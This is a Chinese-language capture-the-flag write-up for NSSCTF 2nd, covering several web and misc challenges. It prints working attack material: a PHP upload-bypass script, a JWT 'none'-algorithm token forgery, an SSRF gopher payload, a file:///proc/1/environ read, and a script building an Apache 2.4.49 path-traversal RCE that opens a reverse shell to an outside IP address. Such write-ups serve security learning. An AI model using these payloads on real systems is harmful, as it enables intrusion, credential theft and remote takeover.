NSSCTF 2nd WP

2023-08-29 20:07:23

Web

php签到

/. 绕过pathinfo判断，直接上传php文件，注意要url加密一下

import requests
url = "http://node6.anna.nssctf.cn:28990/"
result = requests.post(url,files={"file":("%31%2e%70%68%70%2f%2e","<?php phpinfo();?>")}).content
print(result)

2周年快乐

题目很搞，测了半天导致我失去了第三题的前三血
D盘有提示 curl me flag在www.nssctf.cn/flag
然后要我用终端去curl https://www.nssctf.cn/flag
单纯用curl会报错不存在，出题人牛魔酬宾

MyJs

注册获取token

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzZWNyZXRpZCI6MCwidXNlcm5hbWUiOiJBZWNvdXMiLCJwYXNzd29yZCI6IjEyMyIsImlhdCI6MTY5MzE0NjA3Nn0.3Wq4mpm2exS2mgqcIfHulC-unWSsBpJ7nPvhR8X_-fU

jwt.io解密

sid为token中的secretid，直接取数组让其报错为undefined，jwt空算法攻击导致可伪造

const jwt = require('jsonwebtoken');
global.secrets = [];
var user = {
  secretid: [],
  username: 'nss',
  password: '1',
  "iat":1693146076
}
const secret = global.secrets[user.secretid];
var token = jwt.sign(user, secret, {algorithm: 'none'});
console.log(token);

eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzZWNyZXRpZCI6W10sInVzZXJuYW1lIjoibnNzIiwicGFzc3dvcmQiOiIxIiwiaWF0IjoxNjkzMTQ2MDc2fQ.

直接登录更新session，访问update路由触发原型链污染，观察可见源码中存在ejs模板渲染等，猜测可能存在ejs原型链污染rce

env

Mybox

?url=file:///proc/1/environ
结束

MyBox(revenge)

file:///app/app.py读的源码

明显一个SSRF的利用点，mybox替代了gopher协议
掏个不知道啥时候收集的ssrfpoc生成脚本，发个包看看内网80端口的信息

mybox://127.0.0.1:80/_GET%2520/index.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AUser-Agent%253A%2520curl/7.43.0%250D%250AAccept%253A%2520%252A/%252A%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%25200%250D%250A%250D%250A%250D%250A

2.4.49，很明显的漏洞版本，在生成poc直接反弹shell即可

import urllib
import urllib.parse
import urllib.request

def PAR_POST(path, content, host='127.0.0.1:80'):
    PAR ="POST /{} HTTP/1.1\n" \
    "Host: {}\n" \
    "User-Agent: curl/7.43.0\n" \
    "Accept: */*\n" \
    "Content-Type: application/x-www-form-urlencoded\n" \
    "Content-Length: {}\n\n" \
    "{}\n".format(path, host, len(content), content)

    print(PAR)

    NEW_PAR = urllib.parse.quote(PAR)
    NEW_PAR = NEW_PAR.replace('%0A','%0D%0A')
    res = 'gopher://127.0.0.1:80/_' + NEW_PAR
    return urllib.parse.quote(res)


a=PAR_POST("cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh","echo;bash -c 'bash -i >& /dev/tcp/43.137.36.145/3333 0>&1'")
print(a)

这题有点问题的是，ssrf打内网80端口有时候会报错，不太清楚什么情况，不过和上一题基本一样的环境，所以就直接打了

MyHurricane

一个tornado ssti，很少见啊,看源码waf ban了很多 () or and ‘ “ 大括号等
这群B太能卷了，给我顶下去了，那我只能半夜起来看看题了，拷打chatgpt+试验，然后就几把拿下了，不过感觉是非预期，我决定把这题留到早上7点交，我要sleep了

Misc

Magic Docker

启动会删flag，拷打一下gpt

gift_in_qrcode

反正就是连上去自己就会把数字丢出来，输入一下就给flag了

2023-08-29 20:07:23